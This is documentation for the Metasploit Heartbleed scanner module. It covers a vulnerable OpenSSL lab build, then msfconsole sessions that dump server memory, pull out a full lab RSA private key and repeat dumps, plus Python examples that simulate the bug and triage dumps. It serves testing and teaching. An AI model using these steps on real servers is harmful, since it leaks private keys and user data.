metasploit-gs/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md
2019-10-16 18:00:57 -04:00

## Vulnerable Application
The heartbleed bug was extremely well [documented](http://heartbleed.com), but essentially boils down to a client being able to specify
how much memory the server returns when it answers a TLS heartbeat. The result is an arbitrary memory read: the attacker receives the
contents of the server process's memory in the heartbeat response.
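The length-check failure behind the bug, as an added example that is not code from the Metasploit module or from OpenSSL. It models the heartbeat record layout (type, 16-bit payload length, payload, padding) over a plain `bytes` buffer standing in for the server process's memory; the "adjacent" key-like bytes are constructed for the demo. The vulnerable handler trusts the length field the client sent, the fixed handler refuses any message whose declared payload does not fit inside the bytes actually received.

```python
"""Simulated handling of a TLS heartbeat record (RFC 6520 layout).

Added example for this write-up; it is not code from the Metasploit module
or from OpenSSL. A bytes object stands in for the server process's memory,
and the material placed after the record is constructed for the demo.
"""
import struct

HB_REQUEST = 1
PADDING_LEN = 16  # RFC 6520 minimum padding length

# Constructed stand-in for whatever happens to sit next to the record on the heap.
ADJACENT_MEMORY = b"-----BEGIN RSA PRIVATE KEY-----\nMIIE(constructed, not a real key)"


def build_heartbeat(payload: bytes, claimed_len: int) -> bytes:
    """Heartbeat message: type (1) | payload_length (2) | payload | padding.

    An honest client sets claimed_len == len(payload); the bug is that the
    server never verified this.
    """
    return bytes([HB_REQUEST]) + struct.pack("!H", claimed_len) + payload + b"\x00" * PADDING_LEN


def process_heartbeat_vulnerable(memory: bytes, record_len: int) -> bytes:
    """Pre-fix behaviour: trust the 16-bit length field and echo that many
    bytes starting at the payload, regardless of how many bytes (record_len)
    actually arrived. The copy runs past the record into adjacent memory."""
    payload_len = struct.unpack("!H", memory[1:3])[0]
    return memory[3:3 + payload_len]


def process_heartbeat_fixed(memory: bytes, record_len: int):
    """Post-fix behaviour: discard the message unless type + length +
    declared payload + minimum padding fit inside the bytes received."""
    if record_len < 1 + 2 + PADDING_LEN:
        return None  # too short to even carry the header and padding
    payload_len = struct.unpack("!H", memory[1:3])[0]
    if 1 + 2 + payload_len + PADDING_LEN > record_len:
        return None  # over-long length field: silently drop, as the fix does
    return memory[3:3 + payload_len]


def simulate(claimed_len: int, handler) -> bytes:
    """Send a 5-byte payload with the given length field through a handler,
    with ADJACENT_MEMORY laid out directly after the record."""
    record = build_heartbeat(b"hello", claimed_len)
    memory = record + ADJACENT_MEMORY
    return handler(memory, len(record))


if __name__ == "__main__":
    print("honest request, vulnerable server:", simulate(5, process_heartbeat_vulnerable))
    print("over-long length, vulnerable server:", simulate(40, process_heartbeat_vulnerable))
    print("over-long length, fixed server:", simulate(40, process_heartbeat_fixed))
```

With an honest length field both handlers echo `hello`; with a length field of 40 the vulnerable handler returns the payload, the padding and then 19 bytes of whatever followed the record, while the fixed handler returns nothing. The module's `HEARTBEAT_LENGTH` option is the length field in this model, which is why the scan reports a leak of up to 65535 bytes.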
### Install OpenSSL 1.0.1d on Ubuntu 18.04
The following commands download OpenSSL 1.0.1d, then build and install it.
Finally, we use the built-in `s_server` to start the service to be scanned.
`install_sw` is used to prevent an `install` [error](https://askubuntu.com/questions/454575/error-255-when-trying-to-install-openssl-1-0-1g-from-source).
```
sudo apt-get install build-essential
wget https://www.openssl.org/source/old/1.0.1/openssl-1.0.1d.tar.gz
tar -zxf openssl-1.0.1d.tar.gz && cd openssl-1.0.1d
./config
sudo make
sudo make install_sw
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
/usr/local/ssl/bin/openssl s_server -key key.pem -cert cert.pem -accept 44330 -www
```
If you receive a `gethostbyname failure` error from `openssl`, add the client (metasploit)
IP and hostname to the server's hosts file.
## Verification Steps
1. Install a vulnerable OpenSSL, start the service
2. Start msfconsole
3. Do: ```use auxiliary/scanner/ssl/openssl_heartbleed```
4. Do: ```set rhosts [ip]```
5. Do: ```set action [ACTION]```
6. Do: ```run```
## Options
**Action**
* SCAN: Scan the host to see if it is vulnerable. If `verbose` is set to `true`, also print the memory that was dumped. This is the default.
* DUMP: Dump the memory and store it as loot.
* KEYS: Similar to DUMP but scan the results for the private key.
**TLS_CALLBACK**
Application protocol to negotiate before TLS, if the target requires one (for example `jabber`). Default is `None`.
**TLS_VERSION**
The specific version of TLS (or SSL) to use, if only specific ones are available. Defaults to `1.0` (TLS1.0).
**MAX_KEYTRIES**
If Action is set to `KEYS`, the maximum number of times to dump memory and attempt to retrieve the private key.
Similar to `LEAK_COUNT` but only applies to `KEYS`. Default is `50`.
**STATUS_EVERY**
If Action is set to `KEYS`, how often the status should be printed. Default is `5`.
**DUMPFILTER**
A regular expression (used in the scan function) to filter the dump before storing it. Default is `nil`.
**RESPONSE_TIMEOUT**
How long to wait for the server to respond in seconds. Default is `10`.
**LEAK_COUNT**
If Action is set to `SCAN` or `DUMP`, the maximum number of times to dump memory.
Similar to `MAX_KEYTRIES`. Default is `1`.
## Advanced Options
**HEARTBEAT_LENGTH**
How much memory to attempt to retrieve. Default is `65535`.
**XMPPDOMAIN**
If `jabber` is selected for `TLS_CALLBACK`, the domain to use. Default is `localhost`.
## Scenarios
### SCAN against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d
With the default action of `SCAN` we can determine if the server is vulnerable or not.
```
msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222
rhosts => 222.222.2.222
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 44330
rport => 44330
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
[+] 222.222.2.222:44330 - Heartbeat response with leak, 65535 bytes
[*] 222.222.2.222:44330 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### KEYS against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d
To help the keys surface in the dump, we can run the following command to help populate memory with
the keys:
```
watch 'cat openssl-1.0.1d/key.pem; cat openssl-1.0.1d/cert.pem'
```
```
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action KEYS
action => KEYS
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
[*] 222.222.2.222:44330 - Scanning for private keys
[*] 222.222.2.222:44330 - Getting public key constants...
[*] 222.222.2.222:44330 - 2019-10-13 01:32:17 UTC - Starting.
[*] 222.222.2.222:44330 - 2019-10-13 01:32:17 UTC - Attempt 0...
[+] 222.222.2.222:44330 - 2019-10-13 01:32:18 UTC - Got the private key
[*] 222.222.2.222:44330 - -----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA7ax3L0LRt5uZQTFOiJkX2xRn9ww/G87gMkMBAdeEzph7a2/i
C4stnajh9NsUbACv+dt8mtwgh0Vg4lMaI5iB9lXlqfsR17vIsW+/AZXj3Eo+B0QU
l8MpVilDvm3Hee0tE9NGLMR+Vk1Eq0UL+w7Gc/IswkFtj8XGMQ3Jc6OaJ6Ofh5hF
VlmyQBrtwvZ/20g5KtMbZFv1XX28bjEd47qfTo8nrnCsrjD7h7R42GrRw9hhvWse
sEa9VyTwQF0W8mxTYFx/7evXeJNVw1drmhJrxpGfb9gl8qzQgf6PQoi1LXaPAdk5
1cshKeGXmcA+1FR5HOdvWEqzCjMxApzdExNSgwIDAQABAoIBACmdYAT7ayL98JiU
nI6YV6/5Y7bDAy3ITEMgrkV3Sf6ufjWykl65ENShJGcuEOZUPHvALZIj5uIoiK04
JcSDyIWsRpk7p8UhUSOYUFZju1DwAupcxkpIVq2Kbh0itaGooJLvFEN0aDaOMu7W
GSHtVVwp1CJzOE7LL0eZhWNlCvHTgwwobaAUYEyrDmkOdWskMC3RGu5JrrfKTK+5
VUwMMAJ7Wf+d+xeTrNHwGGdEvHd23p1B1E3+axG0XqxI7wODz14iAWgd1zp2gSq2
Ji/II0E8Okwl3AR0d8SD0cJeEPHWlrr/6LzBUTHanDBGe2SXP/SMFSvyEpoPw/s8
vovI1okCgYEA8Ju7TuE4V2UQjZi8qcNAFnbxfcS9bk8S+BBKkgKtMY6wZT8h03fP
ouYot1IaRxMVlErrUeVtD/YKD+nhNFFYZGCSChjAhvf1rq/wzRILWpdGZ3SF9UuR
NlNpH1DcVZPOdTxCJ8DfjY72m/ugYysorQdmo9L58BhMKbfp9aHOR0cCgYEA/OCs
73xWEECKS7of0B+3CKriYT7fROu5wP9gFl3/FR8q7275TG2Iwg0rDz4NLGJhcVQ8
4bNAz+OglxqXkIVOf5Cuj8DibAw2JTr+MP5wQUaB0fPdwPcNw/fBq68x/+UpdcM2
B98b2uykN3Q2Zd2g3VVrKUOb4yJlE1EEvVrt8OUCgYEAq6oQe3jIn+Hla4D7qgs6
IE0AgwDpPliAaigFbCMoumDZjYL7eUrUA58+kXysbuU40jKZrjaIF4ktKKlvGcqn
zAXya+24/xLOYLH6lfU30Ix5mLpUEOy3UBE2wTcJ3Ky18oLpmD9NwEutuyBOEDLs
tHbBTkTqOdi8Dk+/RpcI+2UCgYEAj5qDeqiwMyCDqMd0w3sPNTPdxP2wSvJWlVww
0+LjNbpyZnAt0JIvZIuX1VsWngrsbTA6Nq3V83i/vK+UPLUHQ/gEuYv+yP8STIg4
y9fiJZ+Fn5YOa0OhJJVw/S9LhJc9uSt3Znbz2ZojE37CWYzHiom0hkVnpE/m+FY9
C880amUCgYAw8b+F3iBCEzioeUWW62c89yQaV0Ci/BQgvkhLsRRZr5hlt8+NWjSv
Nx2YT7eEcEIMOzOYF0zUH/gLo7UbZXGk/GlupqWP7kumwALz5Hu3gnx5+c69A0yL
FbawD4i1LZxrihOuuy3nt34hIlprjtW2WV49NiWnbwEzZo6ejm5NRg==
-----END RSA PRIVATE KEY-----
[*] 222.222.2.222:44330 - Private key stored in /root/.msf4/loot/20191012213218_default_222.222.2.222_openssl.heartble_250185.txt
[*] 222.222.2.222:44330 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### DUMP against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d
```
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
action => DUMP
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
[+] 222.222.2.222:44330 - Heartbeat response with leak, 65535 bytes
[+] 222.222.2.222:44330 - Heartbeat data stored in /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin
[*] 222.222.2.222:44330 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > cat /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin
[*] exec: cat /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin
]OghE_.[MTb΋kf
"!985
32ED/A
@DA8u- b,Y'LՄձ3-bt`;ˋz4
`wVnvvx'`Y$H |k Eޞ=AGxA
afD9IWϋ3/VsD%|Z;1FF)vCny7mN1v/&YT@e3DʗOpc,yqGgz`^sMk*OuEl]%<,@SзN ""ct{ujЦ*Na\{5vRNW-4S^0be7=rJ>D)V)Cmy-F,~VMDE
s'EVY@H9*[]}n1㺟N'p0xjakFW$@]lS`\xUWko%ЁB-v9!)ᗙ>TyoXJ
31RS0Q0U]v%C#*B|c
K0U#0]v%C#*B|c
K0U00 *H
^#
怅W7Gwn*wFcR~l8C*]@g+;=|8b߬3
1ŏmA,sl1vdmi^y}52'sMG U2[N^p](*\3(icU{
EDMV~,F-ymC)V)×D>JoȻU#S`E ܚ|l᨝-
ok{΄C2
gN1AB/w!)UB/w)U#%\ rVA#_
m&r]J
;/_
rDWMZt0JbBU
|ƭ6,sd7s8$,I|'
Xj%uj}Ya'KsVc.vn:
Bcq)GLy0Ta&aZ*q/#)-ހYiR3rb)
5EX?3w`>"pΦq/}=9'PuJ]ȝ?l]cR$-mH,D^Ș{5xoS-ݴ;v]I@ÁK7H
i,ut~
߃u*nw.fU RXy^|0udhF>-ynŠ1PW
Ii/|+l)Nvc3U7Xud@oz(Lk 0R|75j^%'L;S,"5 ӕv;{q)W
zJX>j;ftDQEz/Rݜ13
1ŏmA,s)!9v-BЬ%okkWUx\`Sl]@$WFkajx0p'N1n}][d*9H@YVE's
EDMV~,F-ymC)V)×D>JoȻU#S`E ܚ|l᨝-
ok{΄C2
gN1AB/wq)U!Ɠ)U)`0)U@ɓ)U!`)U!@)U!@)UB/w15EX?3w`>"pΦq/}=9'PuJ]ȝ?l]cR$-mH,D^Ș{5xoS-ݴq)U!)U8NE<GGΡ)Lңf(+c'B<uΓUPiS6KtgFZ
`dXQ4
mQJGR(w!?e1JOn}v@éeW8Np3)U A)U @'/111oI,Щ\ͭr&1wۯH#
GeOIBu1X^vͭ|Q^vXC8'aYu!࿕)U1Y"&
AWGЊ!)U\7ڊ!p)U)U `)U\7ڊ!)U\7ڊ!p)U\7ڊ! )U0)U P)U\сFAp0:%6U\7ڊ!)U\7ڊ \7ڊ!\7ڊ )U 01)U1)UA)UA0)UAapד)U1)UZQe"C)kUݠe6t76u)1
mLn*]`D>aK@V|Õ)U<!!b{CM>
[A8%ŪY6K
XA5jXq'}cuͶW9*5g3Q a7ڊa7ڊĕ)Uĕ)UP W(E
[&(yu0.IVt1fEI̮N;]2&^} #ƂT|i2&~<Q;TBTAﴕ:/H^Wx]͓!@@c7ڊ@c7ڊPd)UPd)Ulocalhost
::1 localhost6.localdomain6 localhost6
111.111.1.111 client
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
<%NO#&+-91,qksNV^I
n
jgd0`*H yM,0
0E1
0 UAU10U
Some-State1!0U
201011031638Z0E1 Pty Ltd0
0 UAU10U
Some-State1!0U
0ernet*Hits Pty Ltd0"0
w/BѷA1Ng
?2CׄΘ{ko
-l| E`S#U׻ȱoJ>D)V)Cmy-F,~VMDE
s'EVY@H9*[]}n1㺟N'p0xjakFW$@]lS`\xUWko%ЁB-v9!)ᗙ>TyoXJ
31RS0Q0U]v%C#*B|c
K0U#0]v%C#*B|c
K0U00 *H
^#
怅W7Gwn*wFcR~l8C*]@g+;=|8b߬3
Ѓ"l1vdmi^y}52K?!MG U2[N^p](*\3(icU{
GA8u- b,Y'LՄձ3-bt`;ˋz4
`wVnvvx'`Y$H |k Eޞ=AGxA
afD9IWϋ3/VsD%|Z;1FF)vCny7mN1v/&YT@e3DʗOpc,yqGgz`^sMk*OuEn=*LX-*Na\{5vRNW-4S^0be7=r+A`d)Upt)U@qU)U0;)U1)bߜؐ0x.! 4H\A
GeOIB*H@q yM,0
0E1
0 UAU10U
Some-State1!0U
201011031638Z0E1 Pty Ltd0
0 UAU10U
Some-State1!0U
0ernet*Hits Pty Ltd0"0
w/BѷA1Ng
?2CׄΘ{ko
-l| E`S#U׻ȱoJ>D)V)Cmy-F,~VMDE
s'EVY@H9*[]}n1㺟N'p0xjakFW$@]lS`\xUWko%ЁB-v9!)ᗙ>TyoXJ
31RS0Q0U]v%C#*B|c
K0U#0]v%C#*B|c
K0U00 *H
^#
怅W7Gwn*wFcR~l8C*]@g+;=|8b߬3
Ѓ"l1vdmi^y}52qUpѓ)U D)U!]v%C#*B|c*\3(icU{
K!)U!)U!]v%C#*B|c
K!B)U'U0ؓ)U8)U0)U@)U 9)U0)U`)U)U)U)U
GeOPϓ)U U0v'UX'UX'Ub'Ub'Ub'Up'UW'Ua'q'Um'Uxt'UQ@)UAwۯH#
GeOIBu)U)U@!В)U!)U !p)U !)UÒ)U !)U 1U)UQ )UAoI,Щ\ͭr&)U@!1Y"&
AWGЊ`)U!Б)U\7ڊ! )U\7ڊ!<)U\7ڊ Ò)U\7ڊ1p)U!@)U\7ڊ`)U1@)U0QAY"&
AWGЊ@10)Uq0)U)URݜ13
1ŏmA,s)!9v-BЬ%okkWUx\`Sl]@$WFkajx0p'N1n}][d*9H@YVE's
EDMV~,F-ymC)V)×D>JoȻU#S`E ܚ|l᨝-
ok{΄C2
gN1AB/w)U,܁$zK
k졽N"AEV<)HNm[syw62]Q=Mx,f.|E=,nD9 h3F4~n
ZdZ*wc\l`Hԑ0TnzBeժ+e A#AV̗
]vMɸ=O@ʘEf!J3Cvj[t.Rc{.cyݵu&$n*!51ЊغjxfۢԐ`cdB83Hn7ȩ՜kui2B}o~/n$ JbqFBv9IMt'VuL5Z
&'TO (y
`~Ie:cdn]"g}J\plAFvKkR1:? ٭ -@_B|BSfcVES]V^Bm
@z?_@D~o]
1
VWS\J%҅]%q)U108R6kCl2!S|GjG>w8q_C9
{=on 3Eb1p|%h<a:bhj-6Z2w!pB)U@)U!f{?Py0\,s/ޫ5ơ{*{N#W",VWa#a9k?b9濞~e^MQ nwxZ%1ŏmA,s's
EDMV~,F-ymC)V)×D>JoȻU#S`E ܚ|l᨝-
ok{΄C2
gN1AB/w!)U)U#%\ rVA#_
m&r]J
;/_
rDWMZt0JbBU
|ƭ6,sd7s8$,I|'
Xj%uj}Ya'KsVc.vn:
Bcq)GLy0Ta&aZ*q/#)-ހYiR3rb)
5EX?3w`>"pΦq/}=9'PuJ]ȝ?l]cR$-mH,D^Ș{5xoS-ݴ :v)6jInldP-1ɾ
DyEl"e#Ǽ-<KN{<T&E:YDʎc#Ih5<-yұST$mU8||jS.ϖW~dj訦Dx&օUGjb'0hр.:WapX'XN7esC'ɒ$(bM܍Rݜ13
1ŏmA,s)!9v-BЬ%okkWUx\`Sl]@$WFkajx0p'N1n}][d*9H@YVE's
EDMV~,F-ymC)V)×D>JoȻU#S`E ܚ|l᨝-
ok{΄C2
gN1AB/wq)U!Ɠ)U)``)U@ɓ)U!)UB/w!@)U!@)UB/w15EX?3w`>"pΦq/}=9'PuJ]ȝ?l]cR$-mH,D^Ș{5xoS-ݴq)U!)U8NE<GGΡ)Lңf(+c'B<uΓUPiS6KtgFZ
`dXQ4
mQJGR(w!?e1JOn}v@éeW8Np3)U A)U @'/!]7ڊ!\7ڊ<)U 0)U1)U1)UAǕ)U 1\7ڊ\7ڊ0 \7ڊ!)U!9)!)U!@<)U !`;)U!0ӓ)1Q%cʹ!kaliUnR0h"!ĝjfx&~!\7ڊ!ĝjfx&~111
VWS\J%҅]%qA`'Uѓ)Uջ'UA'U)Uջ'UAP)Uד)U0)Ua1 ĕ)U`p0Lfp^=6=qnw90D}citG=xсFAp0:%6GhF(UTDw'leG`}9-ZQe"C)kUݠe6t76u)1
mLn*]`D>aK@V|q'UHn'Uv'U0v'UX'UX'Ub'Ub'Ub'Up'UW'Ua'q'Um'Uxt'U t'UxS'UpR'UPo'Uk'UXO'U`q'Um'Uu'U(u'UV'UV'U`f'f'U]'U\'Uo'U8l'UU'Ue'U['Up'U@m'Un'Uk'UM'UHM'U S'UR'UO'UR'UQ'UN'UM'UL'UA)UA@a7ڊ@a7ڊ@Ǖ)U@Ǖ)UW(E
[&(yu0.IVt1fEI̮N;]2&^} #ƂT|i2&~<Q;TBTAﴕ:/H^Wx]͓!]ObCZAgwitZy
```
The contents of `/etc/hosts` are visible in this file, as it was edited to prevent the `gethostbyname failure` issue previously noted.
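A small triage pass over a dump like the one above, as an added example that is not part of the module. It pulls printable runs out of the raw bytes (the way `strings` does), flags content a reviewer would want to look at first, and shows a keep-if-matches pre-store filter of the kind `DUMPFILTER` provides. The sample dump bytes are constructed here, the regexes are this example's own choices, and the keep-if-matches semantics are an assumption rather than a reproduction of the module's code.

```python
"""Triage of a Heartbleed memory dump: pull printable runs out of the raw
bytes and flag the kinds of content worth looking at first.

Added example for this write-up, not code from the Metasploit module. The
dump below is constructed: control bytes and junk around a hosts-file
fragment and a PEM block, standing in for a stored .bin loot file.
"""
import re

MIN_RUN = 8  # shortest printable run worth reporting, as with `strings -n 8`

# Constructed sample dump; the PEM body is a placeholder, not key material.
SAMPLE_DUMP = (
    bytes(range(32))
    + b"\x80\xff\x01"
    + b"127.0.0.1 localhost\n111.111.1.111 client\n"
    + b"\x00\xfe" * 5
    + b"-----BEGIN RSA PRIVATE KEY-----\nMIIEconstructedNotARealKey\n-----END RSA PRIVATE KEY-----\n"
    + b"\xde\xad\xbe\xef"
)

# Things a triager looks for in leaked memory. These regexes are this
# example's own, not defaults taken from the module.
PATTERNS = {
    "pem_block": re.compile(r"-----BEGIN [A-Z ]+-----"),
    "hosts_entry": re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}[ \t]+\S+", re.M),
    "http_credential": re.compile(r"^(?:Cookie|Authorization):[ \t]*\S+", re.M | re.I),
}


def printable_runs(data: bytes, min_len: int = MIN_RUN) -> list:
    """Return runs of printable ASCII (tab/newline allowed) of at least min_len bytes."""
    pattern = rb"[\x20-\x7e\t\n\r]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def triage_dump(data: bytes) -> dict:
    """Map each pattern name to the strings it matched in the printable runs."""
    text = "\n".join(printable_runs(data))
    findings = {}
    for name, regex in PATTERNS.items():
        hits = regex.findall(text)
        if hits:
            findings[name] = hits
    return findings


def should_store(data: bytes, dump_filter: str) -> bool:
    """Keep-if-matches pre-store filter: store the dump only when the regex
    hits somewhere in the raw bytes. (Assumed to mirror how a DUMPFILTER-style
    option is used; the module's exact semantics are not reproduced here.)"""
    return re.search(dump_filter.encode("ascii"), data) is not None


if __name__ == "__main__":
    for name, hits in triage_dump(SAMPLE_DUMP).items():
        print(name, "->", hits)
    print("store with filter 'PRIVATE KEY'?", should_store(SAMPLE_DUMP, r"PRIVATE KEY"))
```

On the constructed dump this reports the two hosts-file entries and the PEM header and nothing under `http_credential`; the same pass over a real loot file is a quick way to decide whether a dump from a given host deserves a closer look, and `should_store` shows why a `DUMPFILTER` pattern cuts down the number of files written when the module is run repeatedly.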
### Utilizing repeat
Because arbitrary memory is dumped, a high-volume application that uses OpenSSL will cycle potentially valuable data
through memory fairly often. The `repeat` command can be used to execute the module multiple times.
```
msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222
rhosts => 222.222.2.222
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
action => DUMP
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > repeat -n 10 run
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
## Confirming using NMAP
Utilizing the [ssl-heartbleed](https://nmap.org/nsedoc/scripts/ssl-heartbleed.html) script, we can replicate
the `SCAN` action.
```
# nmap -p 44330 --script ssl-heartbleed 222.222.2.222
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 17:52 EDT
Nmap scan report for ubuntu1804.romain (222.222.2.222)
Host is up (0.0017s latency).
PORT STATE SERVICE
44330/tcp open unknown
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
| http://cvedetails.com/cve/2014-0160/
|_ http://www.openssl.org/news/secadv_20140407.txt
MAC Address: 00:0C:29:AA:AA:AA (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
```